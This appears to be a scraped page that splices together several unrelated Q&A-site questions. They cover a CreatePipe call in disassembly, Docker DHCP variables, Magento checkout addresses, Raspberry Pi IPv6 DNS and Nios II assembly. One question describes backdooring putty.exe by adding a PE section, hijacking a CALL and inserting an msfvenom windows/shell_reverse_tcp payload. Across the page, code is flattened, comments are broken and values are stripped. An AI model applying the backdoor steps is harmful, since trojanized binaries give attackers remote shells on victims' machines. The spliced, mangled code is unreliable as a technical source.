Meaning of strange Pointer in assembly code – is this a vector table address?

Apologies if this is a silly question, but I’m confused. I’m working on a reverse engineering assignment. While looking at a disassembled dll of possibly malicious code, I found these lines:

push nsize                  ;  makes sense push offset Security_Attr   ;  makes sense push 80h                    ;  this address does not make sense push offset read_buf        ;  makes sense call CreatePipe             ;  makes sense 

This is calling a Windows function called CreatePipe. “80h” should point to a buffer that the pipe writes to. The value just seems way too small! Is this address pointing to the user_interrupt section of the vector table? If so, is this pipe overwriting user_interrupt handlers in the vector table?

Any pointers are appreciated.

How can I create an environment variable that contains the IP address of an adapter that is set via DHCP?

I am using docker and my scripts reference an environment variable that I’m manually setting in user’s foo account /etc/environment like:


I’m using in my docker-compose file (which I’m running under as foo)

environment:   - ServerIP=$  {SERVER_IP} 

I would like to be able to have a variable DHCP_IP that will be populated when adapter enp0s3 has it’s IP address set so that I can use DHCP_IP in place of SERVER_IP in the docker-compose above.

I’m not concerned about the IP address changing often as I’m using MAC address filtering in my router to assign the same IP. But I don’t want to have to set the IP address manually in a file like I’m doing now.

So how can I put the value of the ip address of enp0s3 into a variable called DHCP_IP, and how can I reference that at the command line or in a file?

Or if you know of an alternative, I’m open to suggestions.

Force quote_address instead of customer address when browser is refreshed Magento 2

I am new to Magento 2 and having hard time understanding how below code is getting shipping address data for display on checkout/#payment page. It displays correct address when we go from shipping to payment page but switches to the 1st address from user’s address book when hit refresh on the payment page. I understand that the user addresses are coming from DefaultConfigProvider(vendor/magento/module-checkout/Model/DefaultConfigProvider.php) which is ultimately getting it from customer repository(customer_address_entity) table. My requirement is to display quote_address not the customer address even when browser has been refreshed knowingly or unknowingly.

<!-- ko foreach: getRegion('ship-to') -->     <!-- ko template: getTemplate() -->     <!--/ko--> <!--/ko--> 

Read about implementing Observerable but not sure where to start since I couldn’t understand how the addresses are switching.

Any help is greatly appreciated since I am losing my mind over this and it appears that Magento is hard to debug?


how to get address of PE section to jump in while backdooring PE binary

I am trying to follow this tutorial to backdoor a simple 32bits PE binary (putty.exe).

The method used is to create a new section (named .test) containing some shellcode, changing the first CALL instruction to JMP on it, executing it, and JMPing back to the original address the first CALL instruction contained before change for JMP.

First part is adding new section, and I am OK with it (done with LordPE). Here are its caracteristics:

Name    VOffset    VSize     ROffset   RSize    Flags .test   00110000   00001000  00106E00  00001000 E0000060 

In immunity, I have loaded putty.exe. Memory view shows me that .test section is getting mapped at address 00510000

Here are the first instructions being launched:

7D4D1512 PUSH EAX 0046F346 CALL putty. <--- I changed this for JMP putty.00510000 0046F34B JMP putty. 

Debug mode JMP indeed to 00510000 ! So I copy/paste the payload at this place and debug again: payload created via:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f hex 

I save the binary an re-launch immunity to debug it:

7D4D1512 PUSH EAX 0046F346 JMP putty.00510000 

But JMP occurs now at the very end of the shellcode ! At 0051008E !

Feeling the beginning of the section with NOP does not change the behavior (always at the end of the shellcode).

How is it possible to force the execution flow to the beginning of my shellcode instead ? As no one seems to have encountered this trouble, I suppose I missed some basics.

The document explains how the address is getting calculating like this:

Next step is to hijack the first instruction by jumping to our new section, for that we need the RVA for both the .test section, first CALL instruction and address of the next instruction.  001C9DE6 > $   E8 15770000 CALL PsExec_b.001D1500 001C9DEB .^E9 7BFEFFFF JMP PsExec_b.001C9C6B  RVA of 001D1500 is RVA_11500. RVA of 001C9DEB is RVA_9DEB, RVA of .test is RVA_7D0000. 

I have no idea how he gets from 001D1500 to 11500 and what is the 1C0000 gap between these two values.

Many thanks for you help understanding this point;

How to make raspberry pi to inform DNS server on router of its IPv6 address? [on hold]

Hosts on my local network get addresses from AT&T gateway. I can see all devices with their IP v4 and v6 address in “Device List” tab of the router web interface. Router also serves as a DNS server for local network and I can use host command to resolve host name to IP v4 and v6 address, e.g.

$   host grigorys-iphone grigorys-iphone has address grigorys-iphone has IPv6 address XXXX:XXXX:XXX:XXXX::d grigorys-iphone has IPv6 address XXXX:XXXX:XXX:XXXX:4d8a:9ff1:b0dd:a649 grigorys-iphone has IPv6 address fe80::1404:1dc:35b6:adc 


$   host desktop desktop has address desktop has IPv6 address XXXX:XXXX:XXX:XXXX:1c55:5137:1f5:42e7 desktop has IPv6 address XXXX:XXXX:XXX:XXXX:9833:6f77:822c:160e desktop has IPv6 address XXXX:XXXX:XXX:XXXX:41fb:5421:5a8d:6764 desktop has IPv6 address XXXX:XXXX:XXX:XXXX:643f:dcac:8d2e:d67e desktop has IPv6 address XXXX:XXXX:XXX:XXXX:891c:a3e6:113f:17fe desktop has IPv6 address XXXX:XXXX:XXX:XXXX:28d9:3a12:d68f:9fb7 desktop has IPv6 address fe80::a1a5:5b60:e49f:fa87 desktop has IPv6 address XXXX:XXXX:XXX:XXXX:a1a5:5b60:e49f:fa87 desktop has IPv6 address XXXX:XXXX:XXX:XXXX::48 desktop has IPv6 address XXXX:XXXX:XXX:XXXX:58be:e692:b62:52ba 

But when I try the same with Raspberry Pi I get just this

$   host raspberrypi raspberrypi has address 

and no IPv6 address, despite it having IPv6 both from DHCPv6 and SLAAC:

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500         inet  netmask  broadcast         inet6 fe80::9ae2:e23b:9ae2:872d  prefixlen 64  scopeid 0x20<link>         inet6 XXXX:XXXX:XXX:XXXX:c54d:5708:6026:d6f3  prefixlen 64  scopeid 0x0<global>         inet6 XXXX:XXXX:XXX:XXXX::2c  prefixlen 128  scopeid 0x0<global>         ether b8:27:eb:fb:2b:8f  txqueuelen 1000  (Ethernet)         RX packets 4474  bytes 934126 (912.2 KiB)         RX errors 0  dropped 739  overruns 0  frame 0         TX packets 362  bytes 55447 (54.1 KiB)         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0 

What is even strange is that router does know about Raspberry Pi’s acquired IPv6 addresses and I see them in the address list:

MAC Address b8:27:eb:fb:2b:8f IPv4 Address / Name / raspberrypi Last Activity   Sat Mar 23 22:18:47 2019 Status  on Allocation  dhcp Connection Type     Wi-Fi Wi-Fi 4 bars 5 GHz Type: Home Name: MyWiFiSSID Mesh Client No IPv6 Address    XXXX:XXXX:XXX:XXXX::2c Type    dhcp Valid Lifetime  3600s Preferred Lifetime  3600s IPv6 Address    XXXX:XXXX:XXX:XXXX:c54d:5708:6026:d6f3 Type    slaac Valid Lifetime  3600s Preferred Lifetime  3600s IPv6 Address    fe80::9ae2:e23b:9ae2:872d Type    slaac Valid Lifetime  forever Preferred Lifetime  forever  

But no information about IPv6 address come from the DNS server. I tried adding inform6 (no arguments) option to /etc/dhcpcd.conf and rebooted Raspberry Pi, but that didn’t change anything.

The question is, how do I make Raspbian on Raspberry Pi to behave like all other hosts on the local network and make DNS server on router to know its IPv6 addresses? What am I missing?

what does “Memory access to address 00000030 looks like unallocated stack space.” warning mean? [on hold]

/nios 2 assembly language/

ADDR_SSEGNUMS: .word 0x4F5B063F, 0x077D6D66, 0x6F7F Arr: .hword 0x00000006 .hword 0x0000005B .hword 0x0000004F .hword 0x00000066 .hword 0x0000006D .hword 0x0000007D .hword 0x00000007 .hword 0x0000007F .hword 0x00000067

.global _start _start: /* initialize base addresses of parallel ports / movia r18, 0x10000000 / red LED base address / movia r19, 0x10000010 / green LED base address / movia r20, 0x10000020 / HEX3_HEX0 base address / movia r21, 0x10000030 / HEX4_HEX7 base address / movia r22, 0x10000050 / pushbutton KEY base address / movia r23, 0x10002000 / interval timer (onboard 50 MHz clock) base address */ movia r17, ADDR_SSEGNUMS movui r10, 10 movia r24, Arr movi r25, 9 movi r26, 0

/* load timer countdown value / movui r3, 0x02af / upper 16-bits of 500000 countdown value / sthio r3, 12(r23) / write to timer start value (high) register / movui r3, 0xf080 / lower 16-bits of 500000 countdown value / sthio r3, 8(r23) / write to timer start value (low) register */ movi r8, 0x4

/* start and continue timer countdown with no interrupts / movui r3, 0x6 / load timer control value / sthio r3, 4(r23) / write to timer control register */

PRESS_A_KEY_TO_START: /* press a pushbutton to start counter / ldwio r2, 0(r22) / load input from pushbuttons / stwio r2, 0(r19) / write to green LEDs */ ble r2, r8, PRESS_A_KEY_TO_START

/* monitor timeout signal to identify when the timer countdown ends (reach 0) / WAIT_FOR_TO_SIGNAL: ldhio r3, 0(r23) / load status register / andi r3, r3, 1 / load timeout (TO) bit / beq r3, r0, WAIT_FOR_TO_SIGNAL / wait until timer timeout (TO is set to 1) */

add r4, r4, r3 /* count number of timeouts */ divu r5, r4, r10 mul r5, r5, r10 sub r5, r4, r5 stwio r5, 0(r18) ble r5,r10, loop1

loop1: bge r26,r25,_start /* compare the size of the array with the counter / ldb r7,0(r24) / load the least significant bit / addi r24,r24,2 / increment / addi r26,r26,1
display: add r27, r7, r0
add r9, r7, r0 stwio r27, 0(r20) /
display the contents of r8 in the first four segment*/
movia r29, 1000000
DELAY: subi r29, r29, 4
bne r29, r0, DELAY /* shift the values of the register by 8 bits*/ stwio r27,0(r20)

        bne r29, r0, loop3          /* if register values are not equal go to loop3*/           

stwio r28, 0(r20) /* display count of timeouts on LEDR / stwio r0, 0(r23) / reset TO bit in status register */ br WAIT_FOR_TO_SIGNAL